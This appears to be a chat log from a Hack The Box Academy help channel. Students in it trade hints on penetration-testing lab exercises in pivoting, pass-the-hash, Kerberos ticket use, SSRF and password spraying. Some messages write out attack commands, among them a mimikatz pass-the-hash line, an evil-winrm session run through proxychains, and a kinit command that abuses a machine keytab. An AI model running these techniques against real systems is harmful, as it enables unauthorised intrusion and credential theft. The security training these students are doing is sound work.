#modules
172.16.1.10
you have to pivot through MS01 and then you can do an attack using Impacket from your Linux box
but as you can see you do not get (Pwn3d!)
you can't execute commands
also the mimikatz one is intended to give you a shell as ms01/administrator but with privileges on dc01 shares
wait, you wrote "Invoke-SMBexec" and I read "impacket-smbexec", which also exists HAHAHAHA
but if you get access denied it's for the same reason you are not getting Pwn3d! on CME
the one that gets access is Julio (he has write privileges on shared resources)
2 last questions
see the difference? @oblique spoke
Are you running cmd as an administrator before you navigate to C:\tools and run mimikatz.exe? Are you running mimikatz with privilege::debug mode?
mimikatz can't give you a shell on a remote machine
david does not have write permissions on Admin$
Does anyone else have/had the problem with "host seems down" when using nmap? Because every single time I get that error, and my VPN is set up correctly
-Pn
-Pn will say the host is online but blocking all ports
probably a Windows machine on the other side (ICMP disabled by default)
totally unrelated to your initial question
if you know it's up and you have a connection with it, use -Pn
I thought he was talking about this question - Using David's hash, perform a Pass the Hash attack to connect to the shared folder \\DC01\david and read the file david.txt
he was indeed
but david can't execute commands on DC01 remotely
he can just read shares
(pwn3d tag on crackmapexec)
Yeah, you can pass his hash with mimikatz and run cmd.exe as an admin and you get sys32 privs to read his txt file
??
did you notice his txt is on 172.16.1.10?
the cmd.exe you ran with mimikatz is NOT on 172.16.1.10
Yes
```
C:\tools> mimikatz.exe privilege::debug "sekurlsa::pth /user:david /rc4:xxxxxxxxxxxxxxx /domain:inlanefreight.htb /run:cmd.exe" exit
```
Then
```
C:\Windows\system32>type \\DC01\d*****
```
yes
you still can't execute commands on DC01
if you do 'whoami' from that new cmd.exe
you will get ms01/administrator
How did I get the flag then?
Yeah exactly 👍
if david were admin on dc01 (julio is)
you could execute commands on dc01 with Invoke-TheHash or psexec.py
among other tools
The question asks to read the file on DC01 with the flag in it not execute commands on the DC though
that is what I told him
because he tried 'Invoke-SMBexec' with david
and he asked why it works with julio but doesn't with david
tried to explain it
Yeah, not going to work, but you replied to me saying mimikatz is not going to give you a shell. Which I know, but if you run mimikatz in a context which requires administrator access (with debug rights) or Local SYSTEM rights and pass his hash, then open cmd, which will be running as an administrator, you can read his file
"mimikatz can't give you a shell on a remote machine" this is what I said
actually that is different from "mimikatz can't give you a shell"
Thanks!
You were on the right track - With the administrative CMD you get from mimikatz see if you can read files from \\DC01\David
trying docker privilege escalation, but why is the container not created?
Yes, but it can give you a shell where you can read files from a remote machine 😉
lol ok
hi
what is the output of the command docker image ls?
found the flag, thanks.
Hi, I'm doing the module "Password Attacks" - "Credential Hunting in Windows". I've used the tool lazagne.exe to extract credentials and got the WinSCP username and password. But the credentials obtained by lazagne.exe are not accepted. Could anyone share some hints on this question?
Oh I got it
Just try different combinations👀
on SQLMap Essentials Attack Tuning I have the flag but it's not working
can someone who did this help me
what is the URL in the JavaScript Deobfuscation HTB course? It just stays "http://SERVER_IP:PORT" and that's not a valid URL
you are missing some character
run it again
also check the hint
Having troubles with proxychains and evil-winrm --> can't find server!
```
proxychains evil-winrm -i 172.16.1.10 -r INLANEFREIGHT.HTB
ProxyChains-3.1 (http://proxychains.sf.net)
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
|S-chain|-<>-127.0.0.1:1080-<><>-172.16.1.10:88-<><>-OK
|S-chain|-<>-127.0.0.1:1080-<><>-172.16.1.10:88-<><>-OK
Error: An error of type GSSAPI::GssApiError happened, message is gss_init_sec_context did not return GSS_S_COMPLETE: Unspecified GSS failure. Minor code may provide more information
Server not found in Kerberos database
Error: Exiting with code 1
```
any solutions?
oh wow that thing was not loading for some reason, thanks bro had to refresh my chrome for a bit
According to GPT there should be an SPN entry for WinRM, but there isn't - could this cause the error?
```
C:\Windows\system32>setspn -L dc01
Registered ServicePrincipalNames for CN=DC01,OU=Domain Controllers,DC=inlanefreight,DC=htb:
        TERMSRV/DC01
        TERMSRV/DC01.inlanefreight.htb
        Dfsr-12F9A27C-BF97-4787-9364-D31B6C55EB04/DC01.inlanefreight.htb
        ldap/DC01.inlanefreight.htb/ForestDnsZones.inlanefreight.htb
        ldap/DC01.inlanefreight.htb/DomainDnsZones.inlanefreight.htb
        DNS/DC01.inlanefreight.htb
        GC/DC01.inlanefreight.htb/inlanefreight.htb
        RestrictedKrbHost/DC01.inlanefreight.htb
        RestrictedKrbHost/DC01
        RPC/adad1f50-8aaf-4555-a268-71d8c86b6a26._msdcs.inlanefreight.htb
        HOST/DC01/INLANEFREIGHT
        HOST/DC01.inlanefreight.htb/INLANEFREIGHT
        HOST/DC01
        HOST/DC01.inlanefreight.htb
        HOST/DC01.inlanefreight.htb/inlanefreight.htb
        E3514235-4B06-11D1-AB04-00C04FC2DCD2/adad1f50-8aaf-4555-a268-71d8c86b6a26/inlanefreight.htb
        ldap/DC01/INLANEFREIGHT
        ldap/adad1f50-8aaf-4555-a268-71d8c86b6a26._msdcs.inlanefreight.htb
        ldap/DC01.inlanefreight.htb/INLANEFREIGHT
        ldap/DC01
        ldap/DC01.inlanefreight.htb
        ldap/DC01.inlanefreight.htb/inlanefreight.htb
```
When referring to WinRM, the typical SPNs that might be registered are WSMAN/hostname or HTTP/hostname. This depends on how WinRM is set up:
WSMAN/hostname: This is the general SPN that would be registered for the WinRM service if it's set up to use Kerberos for authentication.
I'm confused
Can anyone help me? I would really appreciate it
A char was replaced by something else
Or is this the wrong channel for my questions? Maybe I have to contact support?
Tell us how you set up proxychains? Etc.
Do other services work over proxychains?
Need to eliminate where in the process something has stopped working
config file:
```
# proxychains.conf  VER 3.1
#
#        HTTP, SOCKS4, SOCKS5 tunneling proxifier with DNS.
#

# The option below identifies how the ProxyList is treated.
# only one option should be uncommented at time,
# otherwise the last appearing option will be accepted
#
#dynamic_chain
#
# Dynamic - Each connection will be done via chained proxies
# all proxies chained in the order as they appear in the list
# at least one proxy must be online to play in chain
# (dead proxies are skipped)
# otherwise EINTR is returned to the app
#
strict_chain
#
# Strict - Each connection will be done via chained proxies
# all proxies chained in the order as they appear in the list
# all proxies must be online to play in chain
# otherwise EINTR is returned to the app
#
#random_chain
#
# Random - Each connection will be done via random proxy
# (or proxy chain, see chain_len) from the list.
# this option is good to test your IDS :)

# Make sense only if random_chain
#chain_len = 2

# Quiet mode (no output from library)
#quiet_mode

# Proxy DNS requests - no leak for DNS data
#proxy_dns

# Some timeouts in milliseconds
tcp_read_time_out 15000
tcp_connect_time_out 8000

# ProxyList format
#       type  host  port [user pass]
#       (values separated by 'tab' or 'blank')
#
#        Examples:
#
#            	socks5	192.168.67.78	1080	lamer	secret
#		http	192.168.89.3	8080	justu	hidden
#	 	socks4	192.168.1.49	1080
#	        http    192.168.39.93   8080
#
#       proxy types: http, socks4, socks5
#        ( auth types supported: "basic"-http  "user/pass"-socks )
#
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
#socks4 	127.0.0.1 9050
socks5 127.0.0.1 1080
```
Guess this should be OK?
Okay and what are you using to create your tunnel from your pivot host?
chisel also running
Okay and is that showing as connected?
yes
do any other services work over your tunnel?
```
2023/10/24 16:37:56 client: Connecting to ws://10.10.16.26:9999
2023/10/24 16:37:58 client: Connected (Latency 105.384018ms)
```
on linux01
nmap is working
but when running proxychains with evil-winrm it says: Server not found in Kerberos database
IppSec has a video explaining that
I don't have my notes in front of me so can't check this section. But I would recheck all commands
Wait, does WinRM not work over proxychains?
Links or it didn't happen
still the module Password Attacks, section Pass the Ticket from Linux, optional exercise
@sly dome do you mean this video: "PivotAPI - Setting proxychains up to utilize MSSQL Proxy and using Evil-WinRM to get a shell on the box, then downloading and cracking a Keypass Database"
nope
any JavaScript deobfuscation module recommendations to learn it? I just finished the Tier I one
@sly dome you know which video?
34:45
same error
So I spent last night trying to get into dc01 as Linux01$ from the root user on the last question in Password Attacks - Pass the Ticket. This question keeps screwing me up. Does anyone please have any pointers on what I should do?
I'm in root@linux01
Need to get to dc01 as linux01$
you have 2 ways of doing that
using the machine keytab or a ccache file
if you run klist you will see a keytab with linux01$ credentials
then just kinit 'LINUX01$@INLANEFREIGHT.HTB' <keytab path here>
notice the single quotes so bash doesn't interpret the $ symbol
the other way is using the ccache file as usual
So you're saying remove the $ symbol
No...
Or put linux01$@ in quotes
If it's not in single quotes, the command will break because of $
OK got it, thank you so much, I'll try it when I get home
Currently on Enumerating & Retrieving Password Policies, trying to get the flags. Are you supposed to be able to get them remotely? I have tried both CME and rpcclient and get nothing back. Any hints?
yeah
Good day, can anyone give me a nudge on Linux Privilege Escalation - Logrotate? I'm not getting the shell to connect; I was able to change the date/time in logrotate.status
What's the module? what's the question? What have you done so far?
@robust coral there's a #prolabs-zephyr channel, you'll need to follow instructions in #welcome I did not give permission to dm me at all.
@sly dome thanks for the video link! Nevertheless the error stays the same: Server not found in Kerberos database 😦
Are you still trying the optional exercise?
I'm gonna try it xd
Like. The fact you're spending days on something optional instead of moving on shows that you'll probably fall into rabbit holes on the exam
xDD?
but they can't explain an example which doesn't work - also guessing it has to do with the setup
gimme 20 minutes
[SERVER-SIDE ATTACKS] - [Blind SSRF Exploitation Example] - [The target is vulnerable to blind SSRF...]
{Question} -> Why must the reverse shell payload be encoded twice instead of only once?
Thank you! 
one for each URL decode it goes through
Oh I see... in case we had 3 hops before reaching the vulnerable target I would need to encode it 3x then?
Thanks @sly dome
it depends; if the 3 web servers are doing URL decoding, yes
it's something specific to each scenario
not a rule
@sly dome have you tried it or still trying?
I'm at the krb5 config
@sly dome thx for the update
Hi, I'm stuck in the Attacking Thick Client Applications section, Attacking Common Applications module. In the debugger I cannot see the MZ bytes
what was your error
And I have been trying a lot, but no MAP record with rw privileges is showing up
@sly dome Error: An error of type GSSAPI::GssApiError happened, message is gss_init_sec_context did not return GSS_S_COMPLETE: Unspecified GSS failure. Minor code may provide more information Server not found in Kerberos database
@sly dome in proxychains.conf --> don't forget to comment out the DNS proxy option -- just in case
I don't use proxychains
but I get another error
Cannot find KDC for realm "INLANEFREIGHT.HTB"
@sly dome oh my
wmi-exec works though
thanks for your effort - guess skipping that one with evil-winrm is a good option - have wasted enough time now - thanks
getting it now
what did you change?
nothing actually lol
Yo, wsg y'all. I am on the module called Info Gathering - Web Edition, on the Virtual Hosts part. I found the second flag via ffuf and a vhost wordlist. Anyone got an idea on how to find the rest of the vhosts?
On MS01: C:\Windows\system32>setspn -L dc01 - shouldn't there be an SPN for WSMAN/... or something to get WinRM to work?
according to gpt
No matter how I follow the instructions (I have tried every way), I never get the MAP record with rw permissions
So, in the Password Attacks module, there is a chapter on Passwd, Shadow, Opasswd. The last question asks us to get the password for root using Will's credentials. I assume those come from the passwd.bak and shadow.bak files in the .backup folder Will has, or was this all a trick and I spent an hour on hashcat to get nothing from the hashes in shadow?
yes, you crack that
With rockyou? Because that didn't give me anything
probably with the mutated list
xD
I was too scared to cancel the rockyou one so I let it run while working lmao
it's something local with the DNS
nvm, found it
@sly dome maybe I should contact support, as you mentioned earlier?
I don't think so
so just let it be...
later I'm gonna check in Wireshark
can't see a single KRB5 packet
this is very weird l0l
yeah, me too - almost only TCP
@sly dome yeah maybe - where are the pros - xD
is this still about optional exercise ?
yeah
1st question or 2nd one?
1st
use the Pwnbox, everything will work
I tried with Pwnbox - same error
you free now?
yeah
spin the box and check your dm
dm? dont understand?
I sent a Direct message
does it work from pwnbox
it did, I tried it for him a couple of days ago
what is the difference
just some DNS issues that I don't know how to fix on my VM, that's it
exactly
but what DNS config does the Pwnbox have apart from the hosts file
imagine we're in an exam lab and this happens
should be cool knowing how to fix this
Yeah, I mean I had the same doubt, I even pointed my DNS to the DC but it didn't work
/etc/resolv.conf
Yes but that didnt work
ufw enabled?!
no
I always use my own VM for this stuff, I would highly recommend it. Stay away from the pwnbox lol
it's always DNS with Kerberos
I don't remember if just adding those entries fixes it or if you have to use the dnschef method
adding them does not fix
Source: https://github.com/fox-it/bloodhound.py
Usage:
- PIP: pip3 install bloodhound
- Docker:
  - docker build -t bloodhound .
  - docker run -v ${PWD}:/bloodhound-data ...
meant for bloodhound but the core issue should be the same
I mean if this is an error in the modules, it should be explained ... my opinion
iirc not an error in the modules, it's extra credit for a reason
It's not fully explained, it's just saying it's possible
indeed it is explained lol
no
its fully explained
from /etc/hosts to the WinRM connection
Either way It's extra credit aka extra headache
Were you able to figure this out? working on it myself now
sure
Hey, I'm stuck at "Skills Assessment - File Inclusion" for too long,
I've tried everything the module has offered in the File Disclosure on `/index.php?page=` with `/etc/php` but I can't get anything ...
thanks in advance
in this one, try harder..
cant tell you more
hello guys, to find the attack vector on SQLMap Essentials I tried almost everything
almost
thanks
the page takes no param, just refreshing or a GET request XD
so this is the page and way I understand
tell me if you need help, but try a little more
hint: base64
I was trying with Burp first, I thought it was going to be in the search bar or those fields but nothing; now I'm inspecting the network and poking around
what
sorry, was typing too fast
bro, can I DM you
yes
@undone narwhal it does not work on Pwnbox either xd
Afternoon, folks,
I seem to be stuck in the Nmap service enumeration module and am seeing if I can get some help to point me in the right direction. I ended up with two flags and tried to submit both, and neither has worked. I followed through the process of running the banner grab, started tcpdump and then netcat to get the flag with a 200 code. Is this a normal output response? I also plugged the IP into the web browser as well and ended up with a separate flag.
section?
Network Enumeration with Nmap: Service Enumeration
hint: 🤖🤖
The module? It's in the PenTest path in the Academy
hmmm as in robots.txt
How to use the http-robots.txt NSE script: examples, script-args, and references.
Awesome @sly dome I'll check it out. Thank you!
anyone who can share a hint, 'cause I know I'm missing something: how can I use mssqlclient.py to grab the last flag? This is regarding the Privileged Access section from Active Directory Enumeration & Attacks
The module said we can use mssqlclient.py from our local machine, but the MSSQL server is in the 172.16.5.0/24 network
found the flag but the 'cat' command doesn't work ...
OK I see it now, what I don't get is why the whole log format changed...
Hi everyone. I am completely stuck at Attacking Enterprise Networks - Lateral Movement. I tried everything and I am at the stage of killing myself. I can't manage privesc. Please help
https://academy.hackthebox.com/module/163/section/1549
thanks BTW
I kept missing it until I put it in a file ...
ls
idk why I can't get a rev shell
hey guys, currently at the Attacking Common Services easy lab. Found a user with smtp-enum but I'm stuck; tried to brute force my way into each service but no luck. Need a nudge pls
buddy, you're at the easy lab too?
no, still on Attacking Splunk
ahh i see
Hi, I am on AD Assessment 2, Q8, getting Admin on MS01. I have gotten the hint to reuse the admin NTLM hash from SQL01. I believe it is wrong. The hash for the local admin on SQL01 is 136b3ddf<SNIP>248f364, as I can evil-winrm to SQL01 directly with this with a new lab. And it doesn't work on MS01. Can someone give me some other hint on how to get to MS01 Admin? I have tried PrintNightmare and the account AB920 doesn't have enough privilege
pls read the Scenario Setup part on that section
How can you expect anyone to help with that little info and context? What did you try and what failed? Also, are you doing that module blind or following the sections (which is a complete walkthrough)?
when brute forcing make sure you include the target domain in the username (username)@inlanefreight.htb
yes i already did it
found the password with another wordlist and had to slow down the brute force
Why aren't you trying to brute smtp?
I did buddy, but I used the given wordlist
Lol timing
The next step
but never had to use other lists than the given one, that's why I was brute forcing all with no luck
next step is for me to look for MySQL
Internally
the hint that you got is right but could be a bit misleading because the hash isn't for logging in, it's for an "attack" (not really an attack, more like post exploitation)
Attacking Enterprise Networks module, section Web Enumeration & Exploitation, on the last question. It's bypassing blacklisted characters and that sort of thing, and I've managed to see the flag but I can't read it, I assume due to characters like _ . I've tried encoding and everything and just can't get it. Any hints?
that's the right path (hence please remove due to spoiler) but you should get a set of creds, not hashes; maybe try CME
are you following the section or doing it blind?
@vital adder I have been doing a quick skim over it but not fully reading, kinda. Although I have been reading this last one. And I think I skimmed over an important bit lol, 1 min
OK yeah I'm still stuck lol. I just saw the blacklisted ping.php
but I've already been trying to bypass them, which I have up to this point, to see the flag file I need. I just can't cat the file
there is an example where they show you how to encode the cat command and read the ping.php file; you can just change the file to your flag
OK I'll look again, thanks
omg I'm an idiot. thanks @vital adder
haha what an oversight that was
I tried it last night as well and it worked for me; did you take a look at the krb5 config file after installation? Because it didn't set the realms at all, you have to do it manually
Good night, can someone give me a nudge in Linux Priv Esc - Logrotate? I'm not sure what I'm missing, the shell is not executing
ok thx got it
I'm stuck in "Skills Assessment - File Inclusion", please give me some help!
https://academy.hackthebox.com/module/23/section/513
I found the admin panel, but I don't know what to do next, I can't read /etc/passwd
I couldn't find the ldapadmin password in Skills Assessment 1 in the Windows Privilege Escalation module. I have tried almost every string or file that I can think of; it appears there is some flaw in my methodology.
I would be grateful if somebody could please push me in the right direction!
Hi, I am in the Payloads and Shells module's engagement section. For host 2 there is a Metasploit vuln I think should work, but should I use it or exploit it manually?
You can poison the logs on the admin panel
hey ppl, greets!
I'm on the Getting Started knowledge check module.
This is my third run over the module assessment but something weird happens:
After having done web enum, I go for the CMS RCE exploit via msf,
I set my options, check the exploit and so far so good... then I run it and it's different from the other times. So, what I mean by that:
1 -> on my first tries, going in I had a poor shell, then upgraded TTY
-------> This time though I'm already landing in an elevated shell when running the exploit.
2 -> I can't run basic commands I used to be able to when doing the first runs. I'm referring to commands such as:
a. whoami (not found)
b. echo (not found)
c. sudo (not found)
Can anyone please reproduce this, is it the same? Am I doing something wrong maybe?
When running stuff via Metasploit you get to choose what payload you want to use. Sounds like the first time you did a simple shell that you had to upgrade, and the second time you used Meterpreter, which is Metasploit's own "shell" with different commands
You can type "shell" in Meterpreter to drop into a normal shell
f* me... gee, totally forgot.. thanks! @tranquil axle
on kerbrute, when you use the flag "-o valid_usernames.txt"
aren't you supposed to be able to cat the list?
this is the service log; I guess the "request" field is the path of my request, and I want to poison it, but I have visited different paths several times and found that there is no change in this log. Why?
@glossy wedge can you help me ?
have another look at the log poisoning part of the module. It should be similar
Now my problem is that I made the request and nothing has changed in the service log
Nice to hear it's just not me 🙂
btw how much did you have to clean up the valid username list? I get an error when I try password spraying, tried with and without the domain
Hi, I am stuck at this question: "One of the pages you will identify should say 'You don't have access!'. What is the full page URL?" I actually found the page which says 'You don't have access!' but when I submit the URL, it says the URL is not correct
any idea ?
@glossy wedge
I think I have read somewhere that HTB provides one-to-one sessions for some subscription. Is this correct? I do have the subscription.
finally done with the AD module ❤️ interesting finding: in the AD module skills assessment part 2, the US and EU labs have different SAM hashes. Seems like the labs are not exactly the same. Not super important as there are other ways leading to the target.
kerbrute?
Which module and which section is this from?
AD Enumeration & Attacks / Internal Password Spraying - from Linux
You are supposed to be able to cat the list, as it is the list you provide to kerbrute to brute force
as for the error I am not sure
that's strange, because when using the -o flag the file shows nothing. So I had to make a manual copy to a txt file (and clean it up)
your command looks right
where did you get this valid_user list from
I thought we had to generate this list
the terminal
oh I misunderstood it... you were using kerbrute to enum users
and then spray password ok
omg
well if you are using kerbrute to output the valid user list and it is empty then something is wrong at that step
I think i know what I did wrong
there are different ways to get a valid user list.. sorry I didn't understand the -o question
yeah I got it now as I re-read his question. I thought he already had a valid list to feed to kerbrute to spray.
while we are on topic.. do you guys know if enumdomusers from rpcclient is definitive? If we can get that we don't need a dictionary to enum users, right?
hmm
I don't get this to work. I re-enumerate the user list > manually create the user_list since the export is not working > run the password spray and get the same error
seems like something is up; in a previous user enumeration I got 56 valid users, now when I do it the number is 36
hmm
have done that twice
yes it was all configured
if you can share how you did it ✔️
btw, how much clean up did you have to do of the user list?
s...@inlanefreight.local or just the username?
I just followed the same steps shown in the section
dude, it worked when you limited it to usernames starting with s
bro HAHAHAA
the fkn hell, it works from my VM
Isn't this strange? Isn't it realistic to think that the password spray would work on all valid usernames?
no DNS issues?
in real world scenario how would you know to limit yourself to usernames that start with a specific letter...
lol
oh I noticed but didn't think it would go for NTLM auth, because there is a domain name already, right
evil-winrm 
thanks for the help
@sudden blaze
at least we practiced the concepts a lot
troubleshooting is unreal to learn
l0l
What's the fix?
it was going for Kerberos auth, but if you tell it -i IP it tries a reverse DNS lookup and that's not configured
-i HOSTNAME or -i FQDN
yes it is sir
but I was using xenotim's command
and he used -i IP
didn't even notice it
I used this evil-winrm command as a guide
and from there my brain was just trying to fix the DNS issue
I am in the engagement section of the Payloads module. I just want to clear something: can it be done without seeing the hints? If so, can you nudge me in the right direction for the second host, as the hint there gives the creds from recon. I tried using nmap and gobuster and checked the source code and did not find anything
you're talking about the blog?
Yes it's doable without hints
The creds are on the desktop of the attack host
When I asked, they did say they tried with both, so idk what happened there; did it get resolved?
yes
you didn't ask me xD
and of course I do not read all the messages
it's totally doable from your own VM
I would have if I were around 
as it should be
OK dad
how dad
Dad's never around
^
if this is the blog one, the question is just giving you the answer: What language is the shell written in that gets uploaded when using the 50064.rb exploit?
If anyone has some time I would like to kindly request some assistance with Linux Privilege Escalation - Sudo. Getting a weird error
Not just the questions, I want some advice on exploiting the blog. So far I could only gather that the box has 2 open ports, 22 and 80, the blog has a post for the 50064 exploit, and no special hidden directories from a common scan using gobuster, just the basic stuff. Any advice on what else to look for here?
use the exploit
there are not directories
or anything
what's the point of this section? xd
it's a puzzle ?
it's working now but totally nonsense, the SocksOverRDP section HAHA
I thought there was a little hidden something in the box so I did not use the exploit, and the hint just gave the answer so I felt like cheating. Thanks for the tip, I will do the msf exploit
@sly dome so you got the optional exercise working with -i FQDN, right? I was just gonna try that, then saw your solution 🙂
it's explained in the section
to use -i DC01
yeah
didn't you say you tried with -i dc01?
.
yes
This channel isn't for #fortresses , read #welcome to figure out how to access that channel
guess I tried with -i dc01 but had the wrong IP assigned to it, as far as I can remember
ah, yeah, that wouldn't work
finished the Pivoting module but my question is
in the skills assessment, what is the purpose of the Linux host at 172.16.6.45? xD
anyone noticed it?
only port 22 open (SSH)
yea
looking at my notes too
I went for ".25" 😅
6.35?
could be
that's the pivot one
25, pardon
yeah, me too
It had more open ports
w.e.
completing it with ligolo-ng was a great feeling
almost felt like cheating lol
I want to try completing it with a Kerberos ticket
but I'm completely lost
I think I'm just gonna step into the AD module
it may not be possible
🤷 just felt so easy the DC flag after finding plain text creds
probably intended
to practice more I guess I have to complete the AD module and get into Pro Labs
I didn't enjoy the convenient RDP sessions
in the skill assessment?
I think they used it to be more user friendly
the modules
and in a real-life engagement we are likely going to find RDP enabled
yeah, but that's dangerous, imagine kicking someone out of their RDP session
Is the academy site having trouble? My connections keep dying.
Are you running the pwnbox at the same time?
If so that can be it
Also I recommend using the tcp download over udp
Ah ok, i will try the tcp file.
@sly dome
Just wanted to try it on my own VM and it worked with ligolo but not with chisel
didnt try with chisel!
Chisel is also just dumb
Yeah, but the thing is, why did it work on the HTB Pwnbox with chisel
You probably did something slightly different OR version differences
ligolo is just based
Disable proxy_dns in proxychains config file and it will work
I think this is it, I have it enabled on my VM
Hi, I have a constant issue with my RDP connection while accessing the Windows 10 box in the Windows Fundamentals module. Literally 5 minutes and it disconnects... when I respawn the machine things get back to normal and the cycle repeats itself. Internet is fine. Any ideas?
I've tried using xfreerdp and remmina
Use tcp vpn download
agree, smooth like butter
How do I copy
Lightweight facebook-styled blog 1.3 - Remote | php/webapps/50064.rb
to metasploit
ok I'll try thanks !
is it still in .msf4?
It's already there, just use it
it's in searchsploit
You just can't search it in msfconsole
But if you do locate 50064.rb you'll see it's there
if something is in searchsploit and not in metasploit how do I import it?
You don't need to
It's already imported in msfconsole
Literally open msfconsole and type use 50064.rb
it's there, thanks
@fathom pendant it's good now thanks!
any idea of this error?
What options does the module have and what have you entered?
look at RHOSTS - shouldn't it be an external IP?
I used the one mentioned in the hosts file
try using the external IP
RHOSTS is right, I'm not convinced RPORT is correct
You have to also set vhost for this to work.
Oh yeah forgot that quirk of this one
Hello guys, can you help me with a problem?
Create a "For" loop that encodes the variable "var" 28 times in "base64". The number of characters in the 28th hash is the value that must be assigned to the "salt" variable.
but it does not work
Help!
Let me ChatGPT that for you
Read the question again. You don't have to pass the variable $var to the variable $salt, but the number of characters
Afternoon guys, I'm trying to do the task LLMNR/NBT-NS Poisoning (windows) within the active directory enumeration and attacks module, however I'm having issues connecting via RDP. I initially tried connecting with xfreerdp but kept getting a black screen, so tried rdesktop.
I no longer get a black screen, however I get invalid username and password. Was just wondering if anyone else may have auth issues (I've respawned the box multiple times too in case that was an issue)
black screen is a screensaver, just press enter
So it is, thank you kindly
This issue has been asked about 100 times in this channel btw
Screensaver is the new AV
Hi again! Still on Windows Fundamentals trying to use smbclient to list the content of the host 10.129.32.145 which I've created a shared folder on. Problem is I got connection refused which is weird...
Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface
default _gateway 0.0.0.0 UG 100 0 0 eth0
10.10.10.0 10.10.16.1 255.255.254.0 UG 0 0 0 tun0
10.10.16.0 0.0.0.0 255.255.254.0 U 0 0 0 tun0
10.129.0.0 10.10.16.1 255.255.0.0 UG 0 0 0 tun0
192.168.35.0 0.0.0.0 255.255.255.0 U 100 0 0 eth0
based on the info from the routing table I shouldn't have
smbclient -L 10.129.32.145 -U htb-student
do_connect: Connection to 10.129.32.145 failed (Error NT_STATUS_IO_TIMEOUT)
traceroute is failing just ***
Can I ask what am I missing?
OK hands up I didn't search, but it was I got through with rdesktop, I thought I'd missed a step somewhere with them credentials, apologies for that
ok I guess my question is dumb
Dude, did you read the code???
Yes, your code is wrong.
You have to pass the number of characters of the variable $var to the variable $salt, not the content
ok I got it
let me draw
salt=${var} = content
salt=${#var} = number of chars LOOK AT THE #
the devil is in the details
Maybe my code is wrong, but not on this line
What number do you get when you output the variable $salt?
34070
And what number do you get when you count with wc -c?
let me C
would someone be able to help me understand where I've gone wrong, as I can't seem to get the right answer on my AD question, yet it's the only thing that makes sense to me?
And now it works 😉
I have no idea what # is doing
What's the question?
authorization
thank you for that
maybe it doesn't take into account the "\n"
counting the chars of the variable...
humm......
Maybe # starts counting with 0. That would explain the 1 character difference
hummm...2
the question needs an erratum
i posted it long ago
still incorrect
the answer should be 34070
👀
In the module wc is explained. If you do it with that, everything is right.
because the string is 34070 characters
nah but its counting the line break xD
Which is also a character
Rafa, are you Brazilian?
kkkkkkkkkk
Hi I'm stuck in "Skills Assessment - File Upload Attacks" I think I need to use the weird text so it will identify as an image but I don't understand that text (cause without it I get "Only images are allowed"),
anybody have a hint 4 me please??
read the question
please
The number of characters in the 28th hash is the value that must be assigned to the "salt" variable.
this number is 34070
but whoever programmed it used 34071, which is incorrect
the hash length is 34070
LF is an ASCII character
https://www.loginradius.com/blog/engineering/eol-end-of-line-or-newline-characters/#:~:text=LF (character%20%3A%20%5Cn%2C,'%20or%20'Newline%20Character'.
NM I got it
and xd
the hash has 34070 characters
not 34071
the \n is inherited from the echo command
ask the author. From my point of view the result is correct
dude you have a string which is "abcdefg" how many characters are there?
with your "ask the author" logic there are 8 characters
Maybe you two should settle this in a battleground, whoever wins is right
which is incorrect
invisible characters are a bitch
^ xD
But also could just be your code being slightly off
wtf? xD
¯\_(ツ)_/¯
imagine hash="abcdefg"
what will you answer here
The number of characters in the hash is the value that must be assigned to the "salt" variable.
tell me please
7 or 8?
🙄
If it's injecting a new line character or removing a new line character for w/e reason that could be messing it up
If you decide to do this let me know. I would love to watch
And I'm explaining why it could be off by one character
@thorn urchin honestly didn't realize how goated and simple scp was tbh
hey guys currently at attacking common service medium lab
found an ftp server on a non-standard port
yes
450 LIST: Connection refused
no luck with ls
will close the connection and do it again
got it
for anyone struggling at the same point, look at the footprinting module and look for a useful command that downloads all the files
hello everyone, can I request your help with the last question of the Privileged Access | AD Enum & Attack
I can't understand how to run mssqlclient.py from the jump box?
I set up a pivot through the jump box so I can use my own machine
got the flag, medium lab was honestly so easy
the easy lab was more difficult for me :/
lets see what the hard one will make with me
it's a Linux staple, installed by default in like every distro for a reason
Lots of back and forth
Crack password move 1 step forward, grab new thing to crack, move forward
yo im new to this
Hello everyone, I am having difficulty poisoning the web cache in the ABUSING HTTP MISCONFIGURATIONS Identifying Unkeyed Parameters module. I changed the load, did it step by step modulo, placed the load on different pages, waited for a long time, thinking that the bot needed time, but I don't understand how the admin bot redirects in language=de and as a result I can't get the flag for a long time. Please help someone with a hint or tell me how to do this correctly
Hi guys, I'm stuck on "Skills Assessment - File Upload Attacks"
I think I understand what I can't use from the "black list" and can from the "white list"
What is allowed in the "Content-Type"
The "MIME-Type"
so now I'm trying to make a XXE but I can't get it to work ...
can I DM for consulting ??
Need help on this module:
Module: Web Attacks. Section: Bypassing Encoded References.
Can I DM u please
[Module: Attacking Common Services] [Section: Attacking SQL Databases] [Question: What is the password for the "mssqlsvc" user?] Done the module some time ago, but the password isn't valid anymore - is bruteforcing with rockyou.txt the right track?
Yes
Well actually no
Not bruteforcing
There's a way to steal it
The section talks about it :)
ok
Bruteforcing with rockyou can take forever
therefore i asked 🙂
Yeah you should stick to the methods mentioned in the section
Using Splunk Applications in CDSA does anyone have any good resources to learn how to complete this section? Not much offered in the material?
catch the ntlmv2 challenge and crack it with your preferred method
i used rockyou
What exactly do you not understand or would like to have additional learning material?
For the two questions:
Access the Sysmon App for Splunk and go to the "Reports" tab. Fix the search associated with the "Net - net view" report and provide the complete executed command as your answer. Answer format: net view /Domain:_.local
Access the Sysmon App for Splunk, go to the "Network Activity" tab, and choose "Network Connections". Fix the search and provide the number of connections that SharpHound.exe has initiated as your answer.
based on the material so far I've tried to deduce what needs to be done and have done my googling and all that but can't seem to figure out what I "should" be doing to accomplish those tasks
I had no issues with the tasks in the material seemed pretty straight forward
I have solved the question not via the Reports or Network Activity tab, but with the Search tab.
ok so just forgo the activity?
I probably did not solve the task as intended. 🤷♂️
lol thats fair more than one way to do things
Splunk is certainly one of the tools that I need to take a good look at before the exam.
I need some advice on the payloads module
In the live engagement section I compromised all three hosts with metasploit
Ok?
did I do the right thing or should I take another approach
Did you get the flags?
yes
Then unless you wanna manually upload a .war file and dig into how 50064.rb works then you did what's expected
there's very few modules, if any, where there's an unintended solution ¯\_(ツ)_/¯
yeah what do you think this is, oscp?
